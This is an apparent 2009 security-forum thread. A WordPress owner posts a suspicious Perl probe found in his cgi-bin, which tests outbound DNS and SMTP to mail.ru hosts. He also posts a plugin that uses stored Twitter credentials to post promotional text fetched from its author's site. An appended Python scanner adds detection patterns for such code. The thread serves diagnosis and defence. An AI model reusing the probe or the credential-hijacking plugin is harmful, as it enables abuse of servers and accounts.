Government Security
Network Security Resources

test.pl



#1 jaggudada

jaggudada

    Private First Class

  • Members
  • 96 posts

Posted 27 June 2009 - 12:07 AM

I know I'm hacked in WordPress and the hacker keeps on inserting iframes.
I was going through my files and found this file, test.pl.
It looks suspicious to me; can you advise?

Here is the code. It's in my root cgi-bin:

#!/usr/bin/perl -w

	$| = 1;

	my $smtp = 'smtp.mail.ru';
	my $dns = '194.173.175.100';

	print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};

	print "System info\n";
	print "-----------\n\n";
	print "$^O";
	print "\n", `uname -a` if $^O !~ /win/i;
	print "\n\n";

	print "Perl modules\n";
	print "------------\n\n";
	print "strict .......................... ";
	unless (eval ("use strict; return 1;")) { print "Error"; } else { print "Ok"; }
	print "\nSys::Hostname ................... ";
	unless (eval ("use Sys::Hostname; return 1;")) { print "Error"; } else { print "Ok"; }
	print "\nPOSIX ........................... ";
	unless (eval ("use POSIX qw(setsid); return 1;")) { print "Error"; } else { print "Ok"; }
	print "\nErrno ........................... ";
	unless (eval ("use Errno qw(EINPROGRESS); return 1;")) { print "Error"; } else { print "Ok"; }
	print "\nIO::Socket ...................... ";
	unless (eval ("use IO::Socket qw(:DEFAULT :crlf); return 1;")) { print "Error"; } else { use IO::Socket qw(:DEFAULT :crlf); print "Ok"; }
	print "\nIO::Select ...................... ";
	unless (eval ("use IO::Select; return 1;")) { print "Error"; } else { print "Ok"; }
	print "\n\n";

	print "Local server test\n";
	print "-----------\n\n";
	my $s = IO::Socket::INET->new(Proto => "tcp", LocalPort => 36000, Listen => SOMAXCONN, Reuse => 1);
	unless ($s) { print "Error"; } else { close $s; print "Ok"; }
	print "\n\n";

	print "DNS <TCP> client test ($dns)\n";
	print "-----------\n\n";
	my $r = (gethostbyname $dns)[4];
	unless ($r) { print "Error > Can't resolve DNS hostname"; exit; }
	$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
	unless ($s) { print "Error > Can't create socket > $!"; exit; }
	$r = pack ("Sna4x8", 2, 53, $r);
	unless ($s->connect($r)) { close $s; print "Error > Can't connect > $!"; exit; }
	close $s; print "Ok";
	print "\n\n";

	print "DNS <UDP> client test ($dns)\n";
	print "-----------\n\n";
	$s = IO::Socket::INET->new(Proto=>'udp');
	unless ($s) { print "Error > Can't create socket > $!"; exit; }
	my $b = pack ('nSn4', (int rand 65535), 0x1, 0x1, 0x0, 0x0, 0x0);
	foreach (split (/\./, "mxs.mail.ru")) { $b .= pack ('C', length ($_)) . $_; }
	$b .= pack ('Cn2', 0x0, 0xF, 0x1);
	$s->send($b, 0, $r);
	$b = "";
	my $t = IO::Select->new($s);
	if ($t->can_read(5)) { $s->recv($b, 512); } else { close $s; print "Error > Timeout"; exit; }
	close $s; print "Ok";
	print "\n\n";

	print "SMTP Client test ($smtp)\n";
	print "-----------\n\n";
	$r = (gethostbyname $smtp)[4];
	unless ($r) { print "Error > Can't resolve SMTP hostname"; exit; }
	$s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
	unless ($s) { print "Error > Can't create socket > $!"; exit; }
	unless ($s->connect(pack ("Sna4x8", 2, 25, $r))) { close $s; print "Error > Can't connect > $!"; exit; }
	$r = <$s>; close $s;
	if (length $r) { print "Ok\n$r"; } else { print "Error > Can't read response"; }

I dont come with dice-so dont play me
http://groups.yahoo....p/blackhatgroup

#2 Guest_Dennis_*

Guest_Dennis_*
  • Guests

Posted 01 July 2009 - 12:15 PM

Yup, seems like you're hacked. If I were you I would check every bit of access and change every password. If it is your own box, reinstall.

#3 jaggudada

jaggudada

    Private First Class

  • Members
  • 96 posts

Posted 11 July 2009 - 01:39 AM

Yup, seems like you're hacked. If I were you I would check every bit of access and change every password. If it is your own box, reinstall.


Thanks Dennis, I removed all suspicious code and changed passwords, and the iframes stopped.

#4 jaggudada

jaggudada

    Private First Class

  • Members
  • 96 posts

Posted 11 July 2009 - 01:46 AM

Here is another suspicious script I downloaded off some website, but I noticed that once I put in the login passwords for the social bookmarking websites, the other website also manages to insert their content into my social bookmarking accounts.
Since then I have taken the PHP script off; luckily I only used dummy accounts that are not important.
<?php
/*
Plugin Name: WP Social Traffic
Plugin URI: http://www.wicked-wordpress-themes.com
Description: This plugin automatically sends your new posts to: Twitter.com and Tumblr.com. Instantly gain dozens of new visitors each time you update your blog. The plugin is often updated to support new services, so keep checking its official page for updates. *****IMPORTANT!!***** If you already have another plugin posting your content to these services, deactivate it else your posts will be submitted twice to them!
Version: 1.0
Author: wicked
Author URI: http://www.wicked-wordpress-themes.com
*/

// Configuration section
// This will be moved to Wordpress Dashboard soon...! 

// Twitter username and password
$twitter_username = "my twitterlogin";
$twitter_password = "mytwitterpassword";

// Tumbler EMAIL and password
$tumblr_email    = "your_email";
$tumblr_password = "your_password";

// Delicious.com username and password
$delicious_username = "your_username";
$delicious_password = "your_password";

// Diigo.com username and password
$diigo_username = "your_username";
$diigo_password = "your_password";

// Tags for delicious and diigo. Separate by spaces.
$tags = "computers technology blog articles";

// To do on next version: automatic tags insertion based on post title

// End of config... Don't change anything below unless you are sure what you are doing!



function socialize($post_ID)  {
    global $twitter_username, $twitter_password, $tumblr_email, $tumblr_password, $delicious_username, $delicious_password, $diigo_username, $diigo_password, $tags;
    $post_title  = stripslashes($_POST['post_title']);
    $post_title  = html_entity_decode($post_title);
    $tumblr_text = html_entity_decode($_POST['content']);
    $tumblr_text = strip_tags($tumblr_text);
    $tumblr_text = nl2br($tumblr_text);
    $tumblr_text = substr($tumblr_text, 0,200);
    $permalink   = get_permalink($post_ID);
    $tumblr_text .= "<br />Read more at the source: <a target=\"_blank\" href=\"$permalink\">$post_title</a>";
    $tw_title    = substr($post_title, 0,70);

    // Send to Twitter
    if($twitter_username && $twitter_password){
        $message = "$tw_title $permalink";
        // The twitter API address
        $url = 'http://twitter.com/statuses/update.xml';
        // Alternative JSON version
        // $url = 'http://twitter.com/statuses/update.json';
        // Set up and execute the curl process
        $curl_handle = curl_init();
        curl_setopt($curl_handle, CURLOPT_URL, "$url");
        curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
        curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl_handle, CURLOPT_POST, 1);
        curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "status=" . urlencode($message));
        curl_setopt($curl_handle, CURLOPT_USERPWD, "$twitter_username:$twitter_password");
        $buffer = curl_exec($curl_handle);
        curl_close($curl_handle);

        // Periodically send a promotional message...
        // You have to keep this section if you like this plugin and want it to stay alive :)
        $ld = substr($post_ID, -1);
        if($ld == 1 || $ld == 6 || $ld == 9){
            $data = file_get_contents("http://www.wicked-wordpress-themes.com/wickedmessage.txt");
            $lines = explode("\n", $data);
            shuffle($lines);
            $message = str_replace("\n", "", $lines[0]);
            // The twitter API address
            $url = 'http://twitter.com/statuses/update.xml';
            // Alternative JSON version
            // $url = 'http://twitter.com/statuses/update.json';
            // Set up and execute the curl process
            $curl_handle = curl_init();
            curl_setopt($curl_handle, CURLOPT_URL, "$url");
            curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
            curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($curl_handle, CURLOPT_POST, 1);
            curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "status=" . urlencode($message));
            curl_setopt($curl_handle, CURLOPT_USERPWD, "$twitter_username:$twitter_password");
            $buffer = curl_exec($curl_handle);
            curl_close($curl_handle);
        }
    }
    // End of Twitter operation

    // Start sending to Tumblr
    if($tumblr_email && $tumblr_password){
        // Data for new record
        $post_type = 'regular';

        // Prepare POST request
        $request_data = http_build_query(
            array(
                'email'     => $tumblr_email,
                'password'  => $tumblr_password,
                'type'      => $post_type,
                'title'     => $post_title,
                'body'      => $tumblr_text,
                'generator' => 'Web'
            )
        );

        // Send the POST request (with cURL)
        $c = curl_init('http://www.tumblr.com/api/write');
        curl_setopt($c, CURLOPT_POST, true);
        curl_setopt($c, CURLOPT_POSTFIELDS, $request_data);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($c);
        $status = curl_getinfo($c, CURLINFO_HTTP_CODE);
        curl_close($c);
    }
    // End of Tumblr operation

    // URL-encoded fields shared by the delicious and Diigo requests
    $del_title = urlencode($post_title);
    $del_desc  = urlencode(substr($tumblr_text, 0,80));
    $del_tags  = urlencode($tags);

    // Start sending to delicious
    if($delicious_username && $delicious_password){
        file_get_contents("https://$delicious_username:$delicious_password@api.del.icio.us/v1/posts/add?url=$permalink&description=$del_title&extended=$del_desc&tags=$del_tags&shared=yes");
    }

    // Start sending to Diigo
    if($diigo_username && $diigo_password){
        // Diigo takes comma-separated tags
        $diigo_tags = urlencode(str_replace(" ", ",", $tags));

        // The Diigo API address
        $url = 'http://api2.diigo.com/bookmarks';

        // Set up and execute the curl process
        $curl_handle = curl_init();
        curl_setopt($curl_handle, CURLOPT_URL, "$url");
        curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
        curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl_handle, CURLOPT_POST, 1);
        curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "url=$permalink&title=$del_title&shared=yes&tags=$diigo_tags&desc=$del_desc");
        curl_setopt($curl_handle, CURLOPT_USERPWD, "$diigo_username:$diigo_password");
        $buffer = curl_exec($curl_handle);
        curl_close($curl_handle);
    }

    return $post_ID;
}

add_action ( 'publish_post', 'socialize' );


?>


#5 SL4Y3R

SL4Y3R

    Private

  • Members
  • 10 posts

Posted 22 July 2009 - 03:44 PM

I would do a fresh install; it's hard to know if you for sure got everything, and as also suggested, change all passwords and search out the possible ways they got in. Are you saying they got in through the WordPress/web software?

#6 jaggudada

jaggudada

    Private First Class

  • Members
  • 96 posts

Posted 24 July 2009 - 02:08 PM

I would do a fresh install, its hard to know if you for sure got everything, and as also suggested change all passwords and search out the possible ways they got in. Are you saying they got in through the wordpress/web software?


Nah, I actually got the script from a website.

But I pretty much wanted to know if anybody can see if there is any malicious password-stealer code in there.

When I put my Twitter password login in that script, it does post my Twitters to Twitter automatically, but it also adds a regular Twitter message from the script website on my Twitter account.

I suspect the code below in the script:

// Periodically send a promotional message...
// You have to keep this section if you like this plugin and want it to stay alive :)
$ld = substr($post_ID, -1);
if($ld == 1 || $ld == 6 || $ld == 9){
    $data = file_get_contents("http://www.wicked-wordpress-themes.com/wickedmessage.txt");
    $lines = explode("\n", $data);
    shuffle($lines);
    $message = str_replace("\n", "", $lines[0]);


But I wanted someone more knowledgeable than me in PHP to have a look and tell me if anything looks suspicious in this script in regards to stealing your login at all.

Edited by webdevil, 24 July 2009 - 04:26 PM.
edited code box

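A defender's triage aid for the question asked in this thread, added here as an example and not code from the thread or from the plugin's author: a heuristic source scan that flags the patterns visible in the posted plugin (a hardcoded credential, API endpoints reached over plain HTTP, user:pass embedded in a URL, HTTP basic auth built from plugin variables, and content fetched from a remote host at post time and then reposted under the site owner's accounts). The embedded PHP excerpt is constructed to mirror the plugin's shape; its credentials are placeholders.

```python
import re

# Constructed excerpt mirroring the shape of the plugin posted in the thread;
# not the plugin's real file, and the credentials are placeholders.
SAMPLE_PLUGIN = r'''<?php
$twitter_username = "my twitterlogin";
$twitter_password = "mytwitterpassword";
$url = 'http://twitter.com/statuses/update.xml';
curl_setopt($curl_handle, CURLOPT_USERPWD, "$twitter_username:$twitter_password");
$data = file_get_contents("http://www.wicked-wordpress-themes.com/wickedmessage.txt");
$message = str_replace("\n", "", $lines[0]);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "status=$message");
file_get_contents("https://$delicious_username:$delicious_password@api.del.icio.us/v1/posts/add?url=$permalink");
'''

# Each check is (finding category, compiled regex). These are source-level
# heuristics: a hit is a line to read by hand, not proof of malice.
CHECKS = [
    # A secret assigned as a string literal inside the plugin file itself.
    ("hardcoded-credential",
     re.compile(r'\$\w*(?:password|passwd|secret)\w*\s*=\s*["\'][^"\']+["\']', re.I)),
    # An endpoint reached over plain HTTP: whatever is sent is readable in transit.
    ("plaintext-http-endpoint", re.compile(r'["\']http://[^"\']+["\']')),
    # user:pass embedded in a URL, which tends to end up in proxy and server logs.
    ("credential-in-url", re.compile(r'https?://\$\w+:\$\w+@')),
    # HTTP basic auth assembled from plugin variables (check the endpoint's scheme).
    ("basic-auth-from-variables",
     re.compile(r'CURLOPT_USERPWD\s*,\s*["\']\$\w+:\$\w+["\']')),
    # Content pulled from a remote host at runtime; whoever controls that host
    # controls what the plugin later posts with the site owner's credentials.
    ("remote-fetch", re.compile(r'file_get_contents\s*\(\s*["\']https?://')),
]


def audit_php_source(src):
    """Return a list of (category, line_number, source_line) findings, in file order."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for category, pattern in CHECKS:
            if pattern.search(line):
                findings.append((category, lineno, line.strip()))
    return findings


if __name__ == "__main__":
    for category, lineno, line in audit_php_source(SAMPLE_PLUGIN):
        print(f"line {lineno:>3}  {category:<26} {line}")
```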
